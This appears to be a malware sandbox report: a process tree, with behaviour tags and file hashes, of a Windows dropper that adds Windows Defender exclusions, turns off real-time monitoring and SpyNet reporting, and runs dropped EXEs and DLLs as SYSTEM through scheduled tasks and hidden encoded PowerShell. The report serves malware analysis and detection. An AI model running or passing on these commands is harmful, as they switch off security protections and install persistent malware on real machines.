C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1144 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1332
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1524
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:636 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1840
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1924
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gVSGQFsyE" /SC once /ST 01:16:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1320
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gVSGQFsyE"4⤵PID:280
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gVSGQFsyE"4⤵PID:1696
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bcmBoHFysFBidtSprQ" /SC once /ST 04:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr\AFzekPlfQCDUbED\vrYgctv.exe\" RP /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1384
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {F0FDCBD7-A338-4C18-8EFA-94AED0A2CFF5} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]1⤵PID:1672
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:304
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1124 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1520
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1164 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1004
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1876 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1660
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1172
-
C:\Windows\system32\taskeng.exetaskeng.exe {9EEC7465-2C4C-41C6-947D-7F9E459897E5} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1048
-
C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr\AFzekPlfQCDUbED\vrYgctv.exeC:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr\AFzekPlfQCDUbED\vrYgctv.exe RP /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1060 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gNuENnShu" /SC once /ST 00:11:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1924
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gNuENnShu"3⤵PID:688
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gNuENnShu"3⤵PID:1612
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:976
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:840
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1760
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1584
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gHVVPGccO" /SC once /ST 03:14:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:304
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gHVVPGccO"3⤵PID:1144
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gHVVPGccO"3⤵PID:112
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:323⤵PID:1116
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:643⤵PID:2016
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1696
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:323⤵PID:976
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:324⤵PID:1584
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:643⤵PID:520
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:644⤵PID:1732
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\dZAkCesbbUKSZxso\mCNqEijB\JadRGYPCYtsnLoRK.wsf"3⤵PID:304
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\dZAkCesbbUKSZxso\mCNqEijB\JadRGYPCYtsnLoRK.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1868 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LJVhNoouCIYvC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LJVhNoouCIYvC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fFIwvsLyPfUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fFIwvsLyPfUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNTpTrwDNnPU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNTpTrwDNnPU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xPPqLUFFU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xPPqLUFFU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\STCeEXnoOCFBHvVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\STCeEXnoOCFBHvVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LJVhNoouCIYvC" /t REG_DWORD /d 0 /reg:324⤵PID:1676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LJVhNoouCIYvC" /t REG_DWORD /d 0 /reg:644⤵PID:1924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR" /t REG_DWORD /d 0 /reg:324⤵PID:1320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR" /t REG_DWORD /d 0 /reg:644⤵PID:836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fFIwvsLyPfUn" /t REG_DWORD /d 0 /reg:324⤵PID:1172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fFIwvsLyPfUn" /t REG_DWORD /d 0 /reg:644⤵PID:1712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNTpTrwDNnPU2" /t REG_DWORD /d 0 /reg:324⤵PID:1736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNTpTrwDNnPU2" /t REG_DWORD /d 0 /reg:644⤵PID:1616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xPPqLUFFU" /t REG_DWORD /d 0 /reg:644⤵PID:1544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xPPqLUFFU" /t REG_DWORD /d 0 /reg:324⤵PID:1348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\STCeEXnoOCFBHvVB" /t REG_DWORD /d 0 /reg:324⤵PID:960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\STCeEXnoOCFBHvVB" /t REG_DWORD /d 0 /reg:644⤵PID:2004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr" /t REG_DWORD /d 0 /reg:324⤵PID:892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr" /t REG_DWORD /d 0 /reg:644⤵PID:1056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:324⤵PID:1524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:644⤵PID:524
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gipEOaDDS" /SC once /ST 02:52:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1928
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gipEOaDDS"3⤵PID:1676
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gipEOaDDS"3⤵PID:1612
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:824
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:592
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1696
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yTojJpVlyxZWLIphK" /SC once /ST 02:30:56 /RU "SYSTEM" /TR "\"C:\Windows\Temp\dZAkCesbbUKSZxso\sOClMsGvOFCDJVp\aqjIwDX.exe\" 8a /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1356
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "yTojJpVlyxZWLIphK"3⤵PID:1964
-
-
-
C:\Windows\Temp\dZAkCesbbUKSZxso\sOClMsGvOFCDJVp\aqjIwDX.exeC:\Windows\Temp\dZAkCesbbUKSZxso\sOClMsGvOFCDJVp\aqjIwDX.exe 8a /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:520 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bcmBoHFysFBidtSprQ"3⤵PID:1120
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1580
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1868
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1504
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:636
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\xPPqLUFFU\CxkoPc.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "mvThVpxzbhgVRbG" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:844
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mvThVpxzbhgVRbG2" /F /xml "C:\Program Files (x86)\xPPqLUFFU\iMoiBTK.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1472
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "mvThVpxzbhgVRbG"3⤵PID:1876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "mvThVpxzbhgVRbG"3⤵PID:1096
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xJPCobCplaVVxr" /F /xml "C:\Program Files (x86)\nNTpTrwDNnPU2\wSVqlQY.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:568
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xtMHrquZTnBqG2" /F /xml "C:\ProgramData\STCeEXnoOCFBHvVB\qFTbSFM.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wJXbRFPdEfkDfWLvy2" /F /xml "C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR\uPnwpTN.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1324
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "whexYRdIIbHjcPpcGRQ2" /F /xml "C:\Program Files (x86)\LJVhNoouCIYvC\FrVAdHh.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1696
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "diAnMdtAazTJxxqKi" /SC once /ST 02:05:52 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\dZAkCesbbUKSZxso\OnyYiHZA\vkjuRwy.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:428
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "diAnMdtAazTJxxqKi"3⤵PID:912
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1580
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1304
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:588
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1784
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "yTojJpVlyxZWLIphK"3⤵PID:1456
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dZAkCesbbUKSZxso\OnyYiHZA\vkjuRwy.dll",#1 /site_id 5254032⤵PID:772
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dZAkCesbbUKSZxso\OnyYiHZA\vkjuRwy.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:984 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "diAnMdtAazTJxxqKi"4⤵PID:1956
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1588
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1996
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1256
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5bc1ee4b5643358e1ca67740d435212e3
SHA19b0c91284e96073bc95fc3d02d97acc17b73f0b5
SHA2561684dec6cbb5871660f555ffaa8286f5be5e4eb80026c396debae46eb56f58e8
SHA512a5f988d67a8b6cc7cf30de1bac674c95cf4fbf8edbc4de2c2416636d170108f2a6b42405dffe528092cb2a49aba75088fa542896707ee7a5a7ad3258fdf8cb63
-
Filesize
2KB
MD5de5c84571b61587ff842cd32e15f4bd0
SHA104bd3677208c6d8e58f152a214cf2e444a7c2b6e
SHA256bf1897543bc4576f0fa4f0c2ce82529d9ab4adcdcd6ff9d5ee6501b3db218699
SHA51214b387454b19736e95e3498f280e1bdc08ada4e21490b669280ff4b3965199e827c2f1a8554d09c4d1d9b5558eff2c073275f74f392104b78274c0f78924687d
-
Filesize
2KB
MD5de08d8c3611fbc9cfa3375e620b98916
SHA12451d75596253d229adf17388b60ad7d1b773877
